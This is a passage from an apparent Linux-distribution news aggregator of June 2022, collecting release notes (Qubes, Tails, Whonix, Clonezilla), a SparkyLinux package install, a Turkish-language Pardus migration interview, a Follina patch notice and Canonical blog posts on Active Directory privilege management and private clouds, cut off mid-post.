June 27, 2022

hackergotchi for Purism PureOS

Purism PureOS

How to Challenge Big Tech with Privacy-First Alternatives

The market dominance of Big Tech companies like Apple, Google, and Facebook has shed ample light on how they (mis) handle consumer data. They own tons of personally identifiable information, which may be sold to third-parties at their discretion. Their products and services are designed-to-snoop on their users. It has taken them several decades to create […]

The post How to Challenge Big Tech with Privacy-First Alternatives appeared first on Purism.

27 June, 2022 10:50PM by Yavnika Khanna

hackergotchi for Ubuntu

Ubuntu

Ubuntu Weekly Newsletter Issue 741

Welcome to the Ubuntu Weekly Newsletter, Issue 741 for the week of June 19 – 25, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

27 June, 2022 10:39PM by guiverc

hackergotchi for Qubes

Qubes

Qubes OS 4.1.1-rc1 has been released!

We’re pleased to announce the first release candidate for Qubes 4.1.1! This release aims to consolidate all the security patches, bug fixes, and upstream template OS upgrades that have occurred since the initial Qubes 4.1.0 release in February. Our goal is to provide a secure and convenient way for users to install (or reinstall) the latest stable Qubes release with an up-to-date ISO.

Qubes 4.1.1-rc1 is available on the downloads page.

What is a release candidate?

A release candidate (RC) is a software build that has the potential to become a stable release, unless significant bugs are discovered in testing. Release candidates are intended for more advanced (or adventurous!) users who are comfortable testing early versions of software that are potentially buggier than stable releases. You can read more about the Qubes OS release process in the version scheme documentation.

What is a patch release?

The Qubes OS Project uses the semantic versioning standard. Version numbers are written as <major>.<minor>.<patch>. Hence, we refer to releases that increment the third number as “patch releases.” A patch release does not designate a separate, new major or minor release of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.1.0) inclusive of all updates up to a certain point. Installing Qubes 4.1.0 and fully updating it results in essentially the same system as installing Qubes 4.1.1. You can learn more about how Qubes release versioning works in the version scheme documentation.

What’s new in Qubes 4.1.1?

Qubes 4.1.1-rc1 includes numerous updates over the initial 4.1.0 release, in particular:

  • All 4.1.0 dom0 updates to date
  • Fedora 36 template (upgraded from Fedora 34)
  • Linux kernel 5.15 (upgraded from 5.10)

How to test Qubes 4.1.1-rc1

If you’re willing to test this release candidate, you can help to improve the eventual stable release by reporting any bugs you encounter. We strongly encourage experience users to join the testing team!

Release candidate planning

If no significant bugs are discovered in 4.1.1-rc1, we expect to announce the stable release of 4.1.1 in two to three weeks.

27 June, 2022 12:00AM

Fedora 36 templates available

New Fedora 36 templates are now available for Qubes 4.1!

Please note that Fedora 36 will not be available for Qubes 4.0, since Qubes 4.0 is scheduled to reach end-of-life (EOL) soon. Fedora 35 is already available for both Qubes 4.0 and 4.1 and will remain supported until long after Qubes 4.0 has reached EOL.

As a reminder, Fedora 34 has reached EOL. If you have not already done so, we strongly recommend that you upgrade any remaining Fedora 34 templates and standalones to Fedora 35 or 36 immediately.

We provide fresh Fedora 36 template packages through the official Qubes repositories, which you can install in dom0 by following the standard installation instructions. Alternatively, we also provide step-by-step instructions for performing an in-place upgrade of an existing Fedora template. After upgrading your templates, please remember to switch all qubes that were using the old template to use the new one.

For a complete list of template releases that are supported for your specific Qubes release, see our supported template releases.

Please note that no user action is required regarding the OS version in dom0. For details, please see our note on dom0 and EOL.

Note for release candidate testers: Qubes OS R4.1.1-rc1 already includes a Fedora 36 template by default, so no action is required on your part.

27 June, 2022 12:00AM

June 24, 2022

hackergotchi for Whonix

Whonix

Whonix KVM 16.0.5.3 - Point Release!

This is a cumulative release with emergency security updates. For changelogs see the last three equivalent posts with are identical changes:


Download here:


The Kicksecure release is now live on its respective site kicksecure.com and will not be discussed or announced here in the future, but it is implied that updates to both projects happen in lockstep:

https://www.kicksecure.com/wiki/KVM#Download_Kicksecure

1 post - 1 participant

Read full topic

24 June, 2022 12:03PM by HulaHoop

June 23, 2022

hackergotchi for Purism PureOS

Purism PureOS

How to Enable Hotspot and Tethering in PureOS on Your Librem 5

When you need to connect a Wi-Fi device to the internet and your phone has a good 4G signal, why not set up secure data sharing? With PureOS on the Librem 5 phone, setting up a hotspot is simple. Head into Wi-Fi settings and enable Hotspot.  Setting up a Hotspot Settings → Wi-Fi → Top Right Menu → […]

The post How to Enable Hotspot and Tethering in PureOS on Your Librem 5 appeared first on Purism.

23 June, 2022 09:13PM by David Hamner

hackergotchi for ARMBIAN

ARMBIAN

hackergotchi for SparkyLinux

SparkyLinux

WineZGUI

There is a new application available for Sparkers: WineZGUI

What is WineZGUI?

WineZGUI (pronounced Wine-Zee-Goo-Eee) is a wine frontend for playing windows games with wine easily. It is a collection of Bash scripts for Wine Prefix Management and Linux Desktop Integration for easier wine gaming experience using Zenity. It allows quick launching of Direct play (not installed) EXE application or game from File Manager like Nautilus and allow creating separate wine prefix for each Windows’ EXE binary.

Installation (Sparky 6 & 7):

sudo dpkg --add-architecture i386
sudo apt update
sudo apt install winezgui

License: GNU GPL 3
Web: github.com/fastrizwaan/WineZGUI

 

23 June, 2022 02:25PM by pavroo

hackergotchi for Tails

Tails

Tails 5.1.1 is out

This release fixes a high severity security issue in tor, that affects performance and possibly anonymity.

Changes and updates

Included software

  • Update tor to 0.4.7.8.

  • Update Thunderbird to 91.10.

  • Update the Linux kernel to 5.10.120. This fixes important security issues.

For more details, read our changelog.

Known issues

None specific to this release.

See the list of long-standing issues.

Get Tails 5.1.1

To upgrade your Tails USB stick and keep your persistent storage

  • Automatic upgrades are available from Tails 5.x.

  • If you cannot do an automatic upgrade or if Tails fails to start after an automatic upgrade, please try to do a manual upgrade.

To install Tails on a new USB stick

Follow our installation instructions:

The Persistent Storage on the USB stick will be lost if you install instead of upgrading.

To download only

If you don't need installation or upgrade instructions, you can download Tails 5.1.1 directly:

What's coming up?

Tails 5.2 is tentatively scheduled for July 5, but it will likely be released later than that.

Have a look at our roadmap to see where we are heading to.

23 June, 2022 10:00AM

June 22, 2022

hackergotchi for Clonezilla live

Clonezilla live

Stable Clonezilla live 3.0.1-8 Released

This release of Clonezilla live (3.0.1-8) includes major enhancements and bug fixes.

ENHANCEMENTS and CHANGES from 3.0.0-26

  • The underlying GNU/Linux operating system was upgraded. This release is based on the Debian Sid repository (as of 2022/Jun/12).
  • Linux kernel was updated to 5.18.5-1.
  • Add packages ngrep, duf, duff and dfc in the live system.
  • Add more options in boot parameters to be parsed, including: extra_pbzip2_opt, extra_lbzip2_opt, extra_plzip_opt, extra_lz4mt_opt, and extra_xz_opt. Thanks to ottokang for this request.
  • Update live-boot as 1:20220505.drbl1, and jfbterm 0.4.7-49.drbl2 (sync the version number with that of Fedora).
  • The option --rsyncable of zstd causes bad performance. It can be 5 times slower for v1.4.x, and worse for v1.5.2. Hence by default we do not use it, and use zstd 1.5.2 again in this release. Ref: https://github.com/facebook/zstd/issues/3150
  • Support more wired NIC device types of name in ocs-live-netcfg. Ref: https://sourceforge.net/p/clonezilla/discussion/Clonezilla_live/thread/6026cbd187/

BUG FIXES

  • Do not let sudo to spawn pseudo-terminal when running a job. Otherwise ocs-live-run-menu will be run twice, and it will make the console weird. Thanks to ottokang for reporting this issue. Ref: https://groups.google.com/g/ocs-clonezilla/c/tB93Vjz9CVw
  • Replace buggy /usr/share/terminfo/j/jfbterm from ncurses-term. Thanks to ottokang for reporting this issue.

22 June, 2022 01:31AM by Steven Shiau

June 21, 2022

hackergotchi for Pardus

Pardus

Sabahattin Zaim Üniversitesi Pardus ve Açık Kaynak Dönüşümü Başarı Hikayesi

Sabahattin Zaim Üniversitesi, tam kapasite ile çalışan Pardus laboratuvarının yanı sıra Liderahenk sistemini hem mevcut sistemle senkronize şekilde hem de tekil olarak kullanıcı yönetebilecek şekilde kullanıyor. Ağ ve Blok Zincir laboratuvarında da kademeli geçiş için Ahtapot denemeleri yapıyor. Üniversite bünyesinde ikinci Pardus laboratuvarını açmak için çalışma yürütülüyor.

Sabahattin Zaim Üniversitesi Pardus ve Açık Kaynak Dönüşümü Başarı Hikayesi

1. Açık kaynak yazılım kullanma kararını almanız nasıl oldu?

Üniversitemizde açılan ilk bölümlerinden biri Bilgisayar Mühendisliği. Bildiğiniz gibi özellikle son 10 yılda oldukça popüler ve hem öğrencilerin hem de piyasanın talebi oldukça yüksek bir bölüm. Türkiye’deki diğer pek çok benzer bölümde olduğu gibi bölümümüz de kurulumdan itibaren yalnızca sahipli ve kapalı kaynaklı yazılımları içeren bir müfredat ile öğretim vermiş. Açık Kaynak ve Özgür Yazılım bilincine sahip meslektaşlarımızın sayısı arttıkça bu yönde bazı adımların atılması gerektiği kurullarda konuşulmaya ve tartışılmaya başlandı. En önemli sebebi piyasada oldukça geniş karşılığı olan Açık Kaynaklı ve Özgür Yazılımların üniversite seviyesindeki müfredatlarda yeterli yer bulamaması ve mezunlarımızın bu teknolojilere yabancı olmasıydı. Piyasadan da bu doğrultuda geridönüşler aldık. 2018 yılından itibaren öncelikle ilgili bölümler, ardından da fakülte bazında Açık Kaynaklı Yazılım kullanımının kademeli olarak artırılması için gerekli çalışmalara başladık.

2. Sabahattin Zaim Üniversitesi’nde nasıl bir sistem topolojiniz var? Pardus sunucu ve istemcileriyle bu topolojinin neresinde duruyor?

Üniversite genelinde kullanılan sistemler diğer pek çok üniversitede olduğu gibi kurulumdan itibaren kapalı kaynak kodlu ve sahipli yazılımlar üzerinde tasarlanmış. Kurulum sonrasındaki tüm süreçler de yıllar içinde buna uygun olarak ilerlemiş. Dolayısıyla tüm sistemi bir kerede değiştirerek yerine Açık Kaynak Kodlu alternatiflerini getirmek oldukça sorunlu bir süreç. Bu nedenle Pardus özelinde tüm Açık Kaynak Yazılım sistemlerimizi mevcut kapalı kaynak kodlu sistemlerle birlikte çalışabilecek şekilde kurgulamamız gerekiyor. Açık Kaynaklı Yazılımlar bu tür entegrasyonlara kolaylık sağladığı için alternatif sistemlerimizi kademeli olarak sisteme dahil edebiliyoruz. Pardus sistemlerimiz için kullanıcı yetkilendirme ve istemci yönetim işlemlerini gerçekleştirdiğimiz Lider sunucumuz da buna örnek verilebilir. LiderAhenk sistemini hem mevcut sistemle senkronize şekilde hem de tekil olarak kullanıcı yönetebilecek şekilde kullandık. Her iki konfigürasyonun da kendine özgü avantaj ve dezavantajlarını test etme imkanı bulduk.

3. Sabahattin Zaim Üniveristesi’nde açık kaynak yazılımlara geçişi hangi iç süreçlerinizde (uygulama sunucusu, terminaller, ofis yazılımları, firewall vs) gerçekleştirdiniz?

Kademeli geçiş için hazırladığımız takvim üniversitenin öğretim dönemlerini baz alıyor. Her bir öğretim döneminde ekosisteme bir yenilik eklemeye çalışıyoruz. Halihazıda öğrencilerimiz pek çok lisans seviyesindeki uygulamalı dersini Pardus laboratuvarında alıyor. Müfredatın Açık Kaynaklı sistemlere geçişi kademeli olarak gerçekleştirildiği için her dönem bu laboratuvara taşınan ders sayısı arttı. Şu an tüm hafta boyunca tam kapasiteyle kullanılan bir Pardus laboratuvarımız var. Haftalık kapasiteyi dolduruğumuz için ikinci Pardus laboratuvarının da açılması için çalışma yürütüyoruz. Öğrencilerimizin uygulamalı derslerde ve ders dışı çalışmalarında kullanabilecekleri veritabanı sunucuları (MySQL ve PostgreSql) da yine Açık Kaynak sistemlerimize dahil. Yine ders ve ders dışı projelerinde kullanabildikleri Açık Kaynaklı Versiyonlama Sistemi GitLab sunucumuz da öğrenci ve hocalarımızın kullanımına açık. Öğretim yönetim sistemi olarak yine kendi sunucularımızda barındırdığımız ve yönettiğimiz Açık Kaynak Kodlu Moodle ve WebWork uygulamaları da derslerimizde oldukça yardımcı oluyor. Bu sistemler de yine Açık Kaynak Kodlu sanallaştırma ve container orkestrasyonu yazılımları olan Docker ve Kubernetes üzerinde çalışıyor. Lisans ve Lisansüstü öğrencilerimize dokümantasyon, rapor, ödev ve tez yazımlarında LaTeX kullanımını özendirici çalışmalar yürütüyoruz. Sistemlerin yönetimi ve güvenliği tarafında LiderAhenk ve Ansible kullanıyoruz. Ahtapot’un da kısa bir süre içinde kullanıma girmesi için çalışmalarımız sürüyor.

4. Sabahattin Zaim Üniversitesi içinde Pardus ve açık kaynak yazılımlara geçiş sürecinin hangi aşamasındasınız? Dönüşüm sürecinde ilerleyen yıllara dair yeni planlarınız var mı?

Üniversite seviyesinde tam göç oldukça uzun bir süreç. Öğrenci, Akademik ve İdari süreçler birbirleriyle entegre fakat oldukça farklı süreçler. Tamamını kapsayacak şekilde bir göç planının kusursuz işlemesi ve sistemi kısa bir süre için dahi olsa sekteye uğratmaması gerekiyor. Bu nedenle kademeli göç şu an için en uygun seçenek olarak görünüyor. Göç stratejimiz öncelikle öğretim müfredatımızda Açık Kaynaklı Yazılımları en etkin şekilde kullanmak, ardından idari süreçlerdeki kademeli göçü başlatmak. İdari süreçlerde en sık kullanılan yazılım ofis yazılımları. Üniversitede yılların birikimi olarak pek çok doküman kapalı kaynak kodlu ve sahipli ofis yazılımı ile üretilmiş ve bu dokümanlar şablon olarak kullanılarak yenileri üretiliyor. Buradaki göçü tetikleyebilmek için hazırlık aşamasında bir projemiz var. Bu proje dahilinde kalite standardları doğrultusunda oluşturulmuş tüm dokümanlarımızın LibreOffice formatlarına kayıpsız olarak dönüştürülmesi için bir çalışma başlatacağız. Doküman arşivimiz LibreOffice ile tam uyumlu olarak çalışabilecek formata dönüştükten sonra ise idari kadroların LibreOffice eğitimi alarak kullanıma başlamalarını öngörüyoruz. Bunun için ise öngördüğümüz süre 2 yıl.

5. Sabahattin Zaim Üniveristesi’nin dönüşümü kapsamında Pardus iş/göç ortağı firmalarla çalıştınız mı?

Pardus ve diğer tüm Açık Kaynaklı Yazılımlara dönüşüm sürecimizi üniversite olmanın da avantajını kullanarak olabildiğince kendimiz yürütmeye çalışıyoruz. Böylelikle bu yetkinliği kurumsal olarak kazanarak hem sürdürülebilirliğini sağlamak hem de öğrencilerimize aktarmak istiyoruz. Bu nedenle dönüşüm sürecinde herhangi bir iş/çözüm ortağı ile çalışmadık. Kritik noktalarda Ulakbim’in desteğinin arkamızda olduğunu biliyoruz. Dönüşümün ileri safhalarında gerekli olduğu durumlarda iş/çözüm ortaklarıyla çalışmaya açığız.

6. Sabahattin Zaim Üniversitesi içinde hangi Pardus ürünlerini (ETAP, Ahtapot, Engerek, Liderahenk vs) kullanıyorsunuz?

Üniversitemizde Pardus ürünlerinden LiderAhenk’i aktif olarak kullanıyoruz. Lider sunucumuz ve Ahenk istemcilerimiz uyumlu şekilde çalışıyor. Aynı zamanda mevcut AD sistemimizle de senkron olarak çalıştığı için kullanıcı yetkilendirme işlemlerini sorunsuz olarak gerçekleştiriyoruz. Pardus laboratuvarı dışındaki araştırma laboratuvarlarımızdan Ağ ve Blokzincir laboratuvarında da Ahtapot denemeleri yapıyoruz. Yeterli yetkinliğe ulaştığımızda yine kademeli olarak kullanıma geçirmeyi planlıyoruz.

7. Açık kaynak yazılımlara geçişle ne tür faydalar sağladınız?

Açık Kaynak Yazılımlara geçişimizdeki en büyük faydanın öğrencilerimizin bu sistemlere aşinalığının artışı ve bilinçlenmesi olduğunu düşünüyoruz. Mezunlarımızın piyasaki ihtiyacın yalnızca bir kısmına hitap eden değil, çok daha geniş bir perspektifte bakabilen yetkin mühendisler olmaları en büyük arzumuz. Son yıllardaki mezunlarımızdan aldığımız geridönüşlere göre Açık Kaynak Kodlu Yazılımları kullanarak geliştirme işleri yapan firmalarda işe başlayarak bu sistemleri iş hayatlarında da kullanmaya devam eden mezunlarımız olduğunu görmek en büyük motivasyon kaynağımız. Diğer yandan Açık Kaynaklı Yazılımları kullanarak bu yazılımlar üzerindeki tüm kontrol yetkisine sahip olmak ve sistemlere ihtiyaçlarımız doğrultusunda müdahale edebilme yetisine sahip olmak özellikle akademik tarafta bizim için oldukça önemli. Böylelikle hiçbir kısıta tabi olmadan özgürce araştırma geliştirme yapabiliyoruz.

8. Açık kaynak yazılımlara geçişte zorluk yaşadınız mı?

Geçiş sürecinde elbette çeşitli zorluklarla karşılaştık. Bunları teknik zorluklar ve kullanıcı direnci olarak ayırabiliriz. Geçiş sürecinde sistemlerin kurulması, çalışır hale getirilmesi ve mevcut sistemlerle entegrasyonunun yapılmasında teknik yetkinlik büyük rol oynuyor. Burada karar alıcı mekanizmalar ile teknik uygulamayı yapacak ekibin de aynı bilinci taşıyor olması çok önemli. Aksi taktirde bu uygulamaları hayata geçirmek zorlu ya da imkansız olabilir. Bu durum aynı zamanda mezunlarımızın sahip olmasını dilediğimiz yetkinliklerin bir göstergesi. Piyasada Açık Kaynaklı Yazılımların kurulum ve yönetimi konusunda tecrübeli teknik personel ihtiyacı fazlayken, bu ihtiyacı karşılayabilecek yeterli mezun maalesef yok. Bu kısır döngüyü kırabilmek için söz konusu çalışmalarımıza daha fazla ağırlık vermeye çalışıyoruz. Yetkin teknik versonelimiz ve bilinçli karar mekanizmalarıyla bu süreci ilerletebildik ve devamını getireceğimize inanıyoruz. İkinci zorluk olan kullanıcı direnci de ilk aşamada karşılaştığımız bir durumdu. Anlaşılabilir şekilde öğrenciler/akademisyenler aşina oldukları ve kullanageldikleri sistemleri değiştirmek konusunda dirençli davranabiliyorlar. Sonraki aşamada bu direnci idari süreçlerin dönüşümünde de göreceğimizi düşünüyoruz. Ancak dönüşüme tabi sistemlerle ilgili uygun seviyede ve yeterli eğitim verildiği taktirde bu direncin çok kısa bir sürede yerini memnuniyete bıraktığını gördük. Kademeli göçümüzün üçüncü yılını tamamladık. Bu sürecin 1.5 yılı pandemi sürecinde uzaktan öğretim ile sürdürüldü ki bu aşamada da Açık Kaynaklı Yazılımlar kullanıldı. Şu an öğrenci ve akademisyen seviyesinde bu sistemlerin kullanımı ve adaptasyonu sağlandı ve sorunsuz şekilde devam ediyor.

9. Tek açık kaynak kullanımınız Pardus mu yoksa başka açık kaynak çözümler de kullanıyor musunuz?

Açık Kaynak ve Özgür Yazılım felsefesini tamamen benimsiyoruz. Bu nedenle yalnızca Pardus ve ilişkili sistemleri değil, daha pek çok Açık Kaynaklı Yazılımı etkin şekilde kullanıyoruz. Kendi Linux sunucularımızda Docker ve Kubernetes altyapısı ile Moodle, WebWork, Jitsi, BigBlueButton yazılımlarını işletiyor ve derslerimizde kullanıyoruz. Kendi veritabanı sunucularımızda MySQL ve PostgreSql servislerini öğrencilerimize sunuyoruz. Kendi versiyonlama sistemimizi GitLab üzerinde çalıştırıyoruz. Lisansüstü araştırma ve ders dışı faaliyetlerimizde Robot Operating System (ROS) kullanıyoruz. Araştırma projelerinde pek çok Açık Kaynaklı programlama kütüphanesi ve yazılımı kullanıyoruz. Açık Kaynaklı sunucu sanallaştırma yazılımları ve bunların üstünde çalışan pek çok sistemimiz halihazırda aktif olarak kullanılıyor. Amacımız herhangi bir zamanda gerekli olduğu durumda kapalı kaynak kodlu ve sahipli bir yazılımı bırakarak açık kaynak kodlu alternatifine geçebilmeye hazır konumda olmak. Bu nedenle henüz geçiş yapmadığımız sistemleri de kademeli olarak hazırlamaya ve çalışır halde tutmaya özen gösteriyoruz.

10. Pardus özelinde bakacak olursak, hem yerli hem de açık kaynak bir yazılımı kullanmanın avantajları neler?

Ulaşılabilirlik en büyük etken. Ulakbim’in ve Pardus ekibinin desteği ve yardımları bu aşamada çok önemli. Yerli bir yazılımı ciddi süreçlerde kullanmak da bize gurur veriyor. Pardus’un ve çevresindeki diğer sistemlerin gelişebilmesi için kullanımının artması ve geribildirimlerin yapılması çok önemli. Bunun için de elimizden geldiğince çalışıyor ve katkı sağlamaya çalışıyoruz.

11. Açık kaynak yazılımların eğitimdeki yeri ve önemini biliyoruz. Bu çalışmanın öğrenciler için faydalarından biraz bahsedebilir misiniz?

Piyasadaki talebin Açık Kaynaklı Yazılımlar yönünde artışta olduğu son yıllarda aşikar. Hem yurtiçi hem de yurtdışı iş ilanlarında bu sistemlere hakim mezunların arandığını görüyoruz. Öğrencilerimizi bu talebi karşılayabilecek şekilde yetiştirmek istiyoruz. Açık Kaynak dünyası oldukça geniş. Uzmanlaşmak ve belli alanlarda ileri seviyede bilgi sahibi olmak için gerekli motivasyonu almaları için elimizden gelen imkanları sunmaya çalışıyoruz. Öğrencilerin eskiden sunulan ve kısıtlı bir bakış açısı sağlayan sistemlerin yerine dünyaya çok daha geniş bir açıyla bakmaları öncelikli amacımız. Bu yetkinliklere ve bilince sahip olduklarında Açık Kaynak dünyasını daha da ileri taşıyacaklarına eminiz.

12. Öğrencilerden nasıl geri bildirimler aldınız/alıyorsunuz?

Kademeli geçiş sırasında Açık Kaynaklı Yazılımları kısmen kullanarak mezun olan ve ilgili alanlarda çalışmaya başlayan öğrencilerimiz oldu. Kendileri bu becerilerini daha da ileri götürerek çalışma hayatlarına devam ediyorlar. Bu yıl mezun olacak öğrencilerimiz ise önceki yıl mezun olanlara göre daha geniş bir Açık Kaynaklı Yazılım tecrübesine sahip olacak. Aynı zamanda mezunlarımızla öğrencilerimizi bir araya getirdiğimiz aktivitelerde mezunlarımız Açık Kaynak konusunun halihazırda çalıştıkları işlerde ne derece önemli olduğunu öğrencilerimize aktarıyorlar. İlk sınıftan itibaren öğrencilerimiz arasında Açık Kaynaklı Yazılımlar konusunda istekli olanlar da ders dışı faaliyetlerde ve laboratuvarda tekil ya da grup çalışması ile projelerini gerçekleştiriyorlar. Ümidimiz proje gruplarını ve proje sayılarını artırmak ve gelecek yıllarda Açık Kaynak dünyasına daha fazla ve etkin katkı sağlayacak mühendisler yetiştirmek.

Tüm bu süreçlerde desteklerini esirgemeyen Ulakbim ve Pardus ekiplerine teşekkür ediyoruz.

21 June, 2022 12:44PM

hackergotchi for GreenboneOS

GreenboneOS

Follina Update (CVE-2022-30190): Patch available

Microsoft Office has released patches for the Follina vulnerability CVE-2022-30190 (Follina) with the June 14, 2022 Windows Security Update. Appropriate vulnerability tests have been implemented in the Greenbone Enterprise Feed and the Greenbone Community Feed, allowing you to test your network for the vulnerability and take protective measures using the patches. Read more information about the latest Follina update here.

The vendor refers to the following security updates to close the vulnerability:

  • KB5014678: Windows Server 2022
  • KB5014697: Windows 11
  • KB5014699: Windows 10 Version 20H2 – 21H2, Windows Server 20H2
  • KB5014692: Windows 10 Version 1809 (IoT), Windows Server 2019
  • KB5014702: Windows 10 1607 (LTSC), Windows Server 2016
  • KB5014710: Windows 10 1507 (RTM, LTSC)
  • KB5014738: Monthly Rollup Windows Server 2012 R2, Windows RT 8.1, Windows 8.1
  • KB5014746: Security only Windows Server 2012 R2, Windows RT 8.1, Windows 8.1
  • KB5014747: Monthly Rollup Windows Server 2012
  • KB5014741: Security only Windows Server 2012
  • KB5014748: Monthly Rollup Windows Server 2008 R2, Windows 7 SP1
  • KB5014742: Security only Windows Server 2008 R2, Windows 7 SP1

This means that security updates are available for all versions of Windows Server and Client that are still in support. The vulnerability is rated as “important”, which means that users should install the updates promptly to close the gap.
Microsoft said, “The update for this vulnerability is included in the June 2022 Windows Cumulative Updates, and Microsoft strongly recommends that all customers install the updates to fully protect themselves from the vulnerability. Customers whose systems are configured to receive automatic updates do not need to perform any further actions.”

Follina Update

Installing the June 14 patches is all the more important because attackers and security professionals have already found several ways to exploit the vulnerability, but Microsoft has so far only offered workarounds (see also our blog article).
Greenbone has integrated corresponding vulnerability tests into the Greenbone Community Feed and the Greenbone Enterprise Feed and thus offers the possibility to test the network for this vulnerability and to take protective measures if necessary or to use the new Microsoft patches.

21 June, 2022 12:41PM by Elmar Geese

June 20, 2022

hackergotchi for Ubuntu

Ubuntu

Ubuntu Weekly Newsletter Issue 740

Welcome to the Ubuntu Weekly Newsletter, Issue 740 for the week of June 12 – 18, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

20 June, 2022 11:06PM by guiverc

hackergotchi for SparkyLinux

SparkyLinux

Support June 2022

Dears Friends!

There are 10 days left to the end of the month and we have only 31% of donations so far 🙁

We are balancing on a very thin line of profitability of our services.
This means that without your help we may soon disappear from the web for good.

We are very happy when you are satisfied with our work, but we are sad when what we have is not enough to cover our bils and make running our projects and services.

Every year there are more and more of you. From time to time we have to change our VPN server to a bigger one.
Our stats show that of thousands of users who visit us, but only 1% of them reads and open ads – that’s way too few. And that means 99% of you are blocking or ignoring our ads, which translates into very little ad revenue for us.

Without monthly ad revenue and your support, we won’t be able to keep providing you with interesting and useful articles, applications, news or new releases of SparkyLinux.

Please consider supporting our work every month – without you we won’t be able to survive next months.

Aneta and Paweł

20 June, 2022 08:02PM by pavroo

hackergotchi for Whonix

Whonix

Whonix 16.0.5.3 - for VirtualBox - Point Release!

Whonix for VirtualBox

Download Whonix for VirtualBox:


This is a point release.


Major Changes


Upgrade

Alternatively, in-place release upgrade is possible upgrade using Whonix repository.


This release would not have been possible without the numerous supporters of Whonix!


Please Donate!


Please Contribute!


Changelog


Full difference of all changes

Comparing 16.0.5.0-developers-only...16.0.5.3-developers-only · derivative-maker/derivative-maker · GitHub

1 post - 1 participant

Read full topic

20 June, 2022 01:39PM by Patrick

June 17, 2022

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: New Active Directory Integration features in Ubuntu 22.04 (part 3) – Privilege Management

Linux Active Directory (AD) integration is historically one of the most requested functionalities by our corporate users, and with Ubuntu Desktop 22.04, we introduced ADsys, our new Active Directory client. This blog post is part 3 of a series where we will explore the new functionalities in more detail. (Part 1  – Introduction, Part 2 – Group Policy Objects)

The latest Verizon Data Breach report highlighted that leaked credential and phishing combined account for over 70% of the causes of cyberattacks. User management therefore plays a critical role in reducing your organisation attack surface. In this article we will focus on how Active Directory can be used to control and limit the privileges your users have on on their Ubuntu machines.

While there are significant differences between how Windows and Linux systems perform user management, with ADsys we tried to keep the IT administrators’ user experience as similar as possible to the one currently available for Windows machines.

User management on Linux

Before discussing the new ADsys features it is important to understand the types of users available in Ubuntu and how privileges are managed in the operating system.

There are three types of users in Ubuntu:

  • SuperUser or Root User: the administrator of the Linux system who has elevated rights. The root user doesn’t need permission to run any command. In Ubuntu the root user is available but disabled by default. 
  • System User: the users created by installed software or applications. For example when we install Apache Kafka in the system, it will create the user account named “Apache” to perform application specific tasks.
  • Normal User: the accounts which are used by the users and have a limited set of permissions.

Normal users can use sudo to run programs with the administrative privileges which are normally reserved to the root user.

In order to guarantee the right balance between developer productivity and security it is important for IT administrators to have a centrally defined set of users who are able to execute privileges commands on a machine. A crucial step for this, and the primary driver behind the new feature, was the ability to remove local administrators and enable administrative rights based on Active Directory group membership.

Managing Ubuntu users with Active Directory

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh5.googleusercontent.com/e6OOTpKaeUv1ROuw3muFOqjb99Ls4vAcLV63RWClnybecmy9sTqeQj6MFSJvGaJzaiNOcJZP-R4oF3X0qa0zIjeEbrGkegyOn-qNUAEM_FubC8Lda_iQJAeqER8sG05diZgaQw40rLK1nCy0KA" width="720" /> </noscript>
Active Directory Admin Center

As discussed in part 2 of this blog series you need to import in Active Directory the administrative templates generated by the ADsys command line or available on the project GitHub repository. Once done, the privilege management settings are globally enforced machine policies that are available at Computer Configuration > Policies > Administrative Templates > Ubuntu > Client management > Privilege Authorization in your Active Directory Admin Center.

By default members of the local sudo group are administrators on the machine. If the ocal User setting is set to  Disabled the sudo group members are not considered administrators on the client. This means that only valid Active Directory users are able to log in to the machine.

Similarly it is possible to grant administrator privileges to specific Active Directory users and groups, or a combination of both. Using groups is an essential feature to allow you to securely manage administrators across machines, as privileged access reviews will be reduced to reviewing membership to a single or a few Active Directory groups. 

Additional resources and how to get the new features

The features described in this blog post are available for free for all Ubuntu users, however you need an Ubuntu Advantage subscription to take advantage of the privilege management and remote scripts execution features. You can get a personal license free of charge using your Ubuntu SSO account. ADSys is supported on Ubuntu starting from 20.04.2 LTS, and tested with Windows Server 2019.

We have recently updated the Active Directory integration whitepaper to include a practical step by step guide to help you take you full advantage of the new features. If you want to know more about the inner workings of ADsys you can head to its Github page or read the product documentation.

If you want to learn more about Ubuntu Desktop, Ubuntu Advantage or our advanced Active Directory integration features please do not hesitate to contact us to discuss your needs with one of our advisors.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh4.googleusercontent.com/ztFARZsi4jL7tbwOJWSV7Oqidx_4-MXs3sMmS3BexncdzTcnREIBmmEy51AlZY6HuswdE0jEElaWtk1EalrCXZODCJpQPmAwp8nnZw1OdZtjBIOhu_gH9DJy5wwH39KL8oXy1x8gJHVJnqcJMw" width="720" /> </noscript>

17 June, 2022 07:43PM

Ubuntu Blog: The private cloud future: Data centres as a service

Even after the public cloud hype, private clouds remain to be a very essential part of many enterprises’ cloud strategy. Private clouds are simply giving CIOs more control over their budgets, enabling better security and allowing the flexibility to build best of breed IT solutions. So let’s stop here and take a step backwards, why are organisations even investing in their IT?

Why are private clouds complicated?

IT is an investment, like any other investment an organisation makes. Think of it financially, nobody will decide to invest because they think it will be cool! There is a financial return at the end of any road that makes the story reasonable. This might be:

  • Cutting down current costs, saving money.
  • Securing the data and applications, building reputation and saving money
  • Improving productivity, helping organisations make more money.
  • Better serving their customers, making more money.
  • Enabling the launching of a new product or service, making more money.
  • Cutting down the time-to-market, making more money faster.

